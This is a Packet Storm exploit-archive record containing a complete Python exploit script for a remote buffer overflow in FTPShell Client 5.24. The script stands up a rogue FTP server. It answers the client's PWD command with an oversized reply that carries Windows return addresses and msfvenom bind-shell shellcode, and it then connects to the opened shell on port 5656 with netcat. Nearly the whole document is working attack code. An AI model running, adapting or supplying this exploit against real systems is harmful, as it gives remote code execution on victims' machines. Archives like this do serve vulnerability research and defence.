{"id": "PACKETSTORM:139835", "vendorId": null, "type": "packetstorm", "bulletinFamily": "exploit", "title": "FTPShell Client 5.24 PWD Remote Buffer Overflow", "description": "", "published": "2016-11-20T00:00:00", "modified": "2016-11-20T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "cvss2": {}, "cvss3": {}, "href": "https://packetstormsecurity.com/files/139835/FTPShell-Client-5.24-PWD-Remote-Buffer-Overflow.html", "reporter": "Yunus YILDIRIM", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2016-11-21T20:47:08", "viewCount": 72, "enchantments": {"score": {"value": 0.5, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.5}, "_state": {"dependencies": 1678912101, "score": 1678911848, "epss": 1678924918}, "_internal": {"score_hash": "1c88fdcf5cc871cee95c2a92b0ce8c52"}, "sourceHref": "https://packetstormsecurity.com/files/download/139835/FTPShell-Client-BoF.py.txt", "sourceData": "`# -*- coding: utf-8 -*- \n \n# Exploit Title: FTPShell Client v5.24 PWD Remote Buffer Overflow \n# Date: 16/11/2016 \n# Author: Yunus YILDIRIM (Th3GundY) \n# Team: CT-Zer0 (@CRYPTTECH) - http://www.ct-zer0.com \n# Author Website: http://yildirimyunus.com \n# Contact: yunusyildirim@protonmail.com \n# Software Link: http://www.ftpshell.com/downloadclient.htm \n# Tested on: Windows XP Professional SP 2 \n# Tested on: Windows 7 Ultimate 32bit, Home Premium 64bit \n \nimport socket \nimport sys \nimport os \nimport time \n \n \ndef banner(): \nbanner = \"\\n\\n\" \nbanner += \" aaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaa aaaaaaa \\n\" \nbanner += \" aaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \\n\" \nbanner += \" aaa aaaaaaaaa aaaaa aaaaaa aaaaaaaaaaaaaaaaa \\n\" \nbanner += \" aaa aaaaaaaaaaaaaa aaaaaa aaaaaaaaaaaaaaaaa \\n\" \nbanner += \" aaaaaaaa aaa aaaaaaaaaaaaaaaaaaa aaaaaaaaaaaa \\n\" \nbanner += \" aaaaaaa aaa aaaaaaaaaaaaaaaaaaa aaa aaaaaaa \\n\" \nbanner += \" \\n\" \nprint banner \n \n \ndef usage(): \nbanner() \nprint \"[-] Missing arguments\\n\" \nprint \"[*] Usage: python FTPShell-exploit.py target_os\" \nprint \"[*] Target types:\\n\\tWindows XP -> winxp\\n\\tWindows 7-32bit -> win7_32\\n\\tWindows 7-64bit -> win7_64\\n\" \nsys.exit(0) \n \n \ndef exploit(target_eip): \ns0ck3t = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \ns0ck3t.bind((\"0.0.0.0\", 21)) \ns0ck3t.listen(5) \nprint \"[*] CT-Zer0 Evil FTP Server Listening port 21\\n\" \n \n# \\x00\\x0a\\x0d\\x22\\xff \n# msfvenom -p windows/shell_bind_tcp LPORT=5656 -f c -b '\\x00\\x0a\\x0d\\x22\\xff' \nshellcode = (\"\\xbb\\x61\\xad\\x84\\xdf\\xda\\xcc\\xd9\\x74\\x24\\xf4\\x5a\\x33\\xc9\\xb1\" \n\"\\x53\\x31\\x5a\\x12\\x83\\xc2\\x04\\x03\\x3b\\xa3\\x66\\x2a\\x47\\x53\\xe4\" \n\"\\xd5\\xb7\\xa4\\x89\\x5c\\x52\\x95\\x89\\x3b\\x17\\x86\\x39\\x4f\\x75\\x2b\" \n\"\\xb1\\x1d\\x6d\\xb8\\xb7\\x89\\x82\\x09\\x7d\\xec\\xad\\x8a\\x2e\\xcc\\xac\" \n\"\\x08\\x2d\\x01\\x0e\\x30\\xfe\\x54\\x4f\\x75\\xe3\\x95\\x1d\\x2e\\x6f\\x0b\" \n\"\\xb1\\x5b\\x25\\x90\\x3a\\x17\\xab\\x90\\xdf\\xe0\\xca\\xb1\\x4e\\x7a\\x95\" \n\"\\x11\\x71\\xaf\\xad\\x1b\\x69\\xac\\x88\\xd2\\x02\\x06\\x66\\xe5\\xc2\\x56\" \n\"\\x87\\x4a\\x2b\\x57\\x7a\\x92\\x6c\\x50\\x65\\xe1\\x84\\xa2\\x18\\xf2\\x53\" \n\"\\xd8\\xc6\\x77\\x47\\x7a\\x8c\\x20\\xa3\\x7a\\x41\\xb6\\x20\\x70\\x2e\\xbc\" \n\"\\x6e\\x95\\xb1\\x11\\x05\\xa1\\x3a\\x94\\xc9\\x23\\x78\\xb3\\xcd\\x68\\xda\" \n\"\\xda\\x54\\xd5\\x8d\\xe3\\x86\\xb6\\x72\\x46\\xcd\\x5b\\x66\\xfb\\x8c\\x33\" \n\"\\x4b\\x36\\x2e\\xc4\\xc3\\x41\\x5d\\xf6\\x4c\\xfa\\xc9\\xba\\x05\\x24\\x0e\" \n\"\\xbc\\x3f\\x90\\x80\\x43\\xc0\\xe1\\x89\\x87\\x94\\xb1\\xa1\\x2e\\x95\\x59\" \n\"\\x31\\xce\\x40\\xf7\\x39\\x69\\x3b\\xea\\xc4\\xc9\\xeb\\xaa\\x66\\xa2\\xe1\" \n\"\\x24\\x59\\xd2\\x09\\xef\\xf2\\x7b\\xf4\\x10\\xea\\x63\\x71\\xf6\\x78\\x84\" \n\"\\xd7\\xa0\\x14\\x66\\x0c\\x79\\x83\\x99\\x66\\xd1\\x23\\xd1\\x60\\xe6\\x4c\" \n\"\\xe2\\xa6\\x40\\xda\\x69\\xa5\\x54\\xfb\\x6d\\xe0\\xfc\\x6c\\xf9\\x7e\\x6d\" \n\"\\xdf\\x9b\\x7f\\xa4\\xb7\\x38\\xed\\x23\\x47\\x36\\x0e\\xfc\\x10\\x1f\\xe0\" \n\"\\xf5\\xf4\\x8d\\x5b\\xac\\xea\\x4f\\x3d\\x97\\xae\\x8b\\xfe\\x16\\x2f\\x59\" \n\"\\xba\\x3c\\x3f\\xa7\\x43\\x79\\x6b\\x77\\x12\\xd7\\xc5\\x31\\xcc\\x99\\xbf\" \n\"\\xeb\\xa3\\x73\\x57\\x6d\\x88\\x43\\x21\\x72\\xc5\\x35\\xcd\\xc3\\xb0\\x03\" \n\"\\xf2\\xec\\x54\\x84\\x8b\\x10\\xc5\\x6b\\x46\\x91\\xf5\\x21\\xca\\xb0\\x9d\" \n\"\\xef\\x9f\\x80\\xc3\\x0f\\x4a\\xc6\\xfd\\x93\\x7e\\xb7\\xf9\\x8c\\x0b\\xb2\" \n\"\\x46\\x0b\\xe0\\xce\\xd7\\xfe\\x06\\x7c\\xd7\\x2a\") \n \nbuffer = \"A\" * 400 + target_eip + \"\\x90\" * 40 + shellcode \n \nwhile True: \nvictim, addr = s0ck3t.accept() \nvictim.send(\"220 CT-Zer0 Evil FTP Service\\r\\n\") \nprint \"[*] Connection accepted from %s\\n\" % addr[0] \nwhile True: \ndata = victim.recv(1024) \nif \"USER\" in data: \nvictim.send(\"331 User name okay, need password\\r\\n\\r\\n\") \nprint \"\\t[+] 331 USER = %s\" % data.split(\" \")[1], \nelif \"PASS\" in data: \nvictim.send(\"230 Password accepted.\\r\\n230 User logged in.\\r\\n\") \nprint \"\\t[+] 230 PASS = %s\" % data.split(\" \")[1], \nelif \"PWD\" in data: \nvictim.send('257 \"' + buffer + '\" is current directory\\r\\n') \nprint \"\\t[+] 257 PWD\" \nprint \"\\n[*] Exploit Sent Successfully\\n\" \ntime.sleep(2) \nprint '[+] You got bind shell on port 5656\\n' \nos.system('nc ' + str(addr[0]) + ' 5656') \n \n \nif len(sys.argv) != 2: \nusage() \nelse: \nbanner() \ntry: \nif sys.argv[1] == \"winxp\": \n# 7C80C75B JMP EBP kernel32.dll \ntarget_eip = \"\\x5B\\xC7\\x80\\x7C\" \nelif sys.argv[1] == \"win7_32\": \n# 76ad0299 jmp ebp [kernel32.dll] \ntarget_eip = \"\\x99\\x02\\xAD\\x76\" \nelif sys.argv[1] == \"win7_64\": \n# 7619dfce jmp ebp [kernel32.dll] \ntarget_eip = \"\\xCE\\xDF\\x19\\x76\" \nelse: \nusage() \nexploit(target_eip) \nexcept: \nprint \"\\n[O_o] KTHXBYE! [O_o]\" \n`\n"}
{}
FTPShell Client 5.24 PWD Remote Buffer Overflow